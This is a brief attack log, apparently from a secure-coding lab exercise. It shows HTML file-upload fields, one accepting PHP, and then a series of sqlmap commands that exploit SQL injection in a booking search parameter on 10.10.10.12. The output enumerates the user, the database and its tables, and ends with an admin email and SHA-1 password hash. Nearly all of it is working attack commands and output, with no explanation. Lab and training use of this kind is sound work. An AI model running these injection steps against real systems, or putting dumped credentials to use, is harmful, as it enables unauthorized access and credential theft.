<input type="file" class="form-control" id="image" accept="text/html/php" name="userfile">


<form><input type=file><button>submit</button></form>


sqlmap
sqlmap -u http://10.10.10.12/search.php?IDBOOKING=1 --current-user
current user: 'karcisusr@%'

sqlmap -u http://10.10.10.12/search.php?IDBOOKING=1 --current-db
current database: 'db_secure_coding_karcis'

sqlmap -u http://10.10.10.12/search.php?IDBOOKING=1 -D db_secure_coding_karcis --tables
+-----------------+
| admin           |
| booking         |
| feedbacks       |
| forgot_password |
| tickets         |
| user_profile    |
| users           |
+-----------------+


sqlmap -u http://10.10.10.12/search.php?IDBOOKING=1 -D db_secure_coding_karcis -T admin --columns
+----+-----------------+------------------------------------------+---------------------+
| id | email           | password                                 | created_at          |
+----+-----------------+------------------------------------------+---------------------+
| 1  | admin@karcis.id | d033e22ae348aeb5660fc2140aec35850c4da997 | 2019-09-19 14:32:06 |
+----+-----------------+------------------------------------------+---------------------+

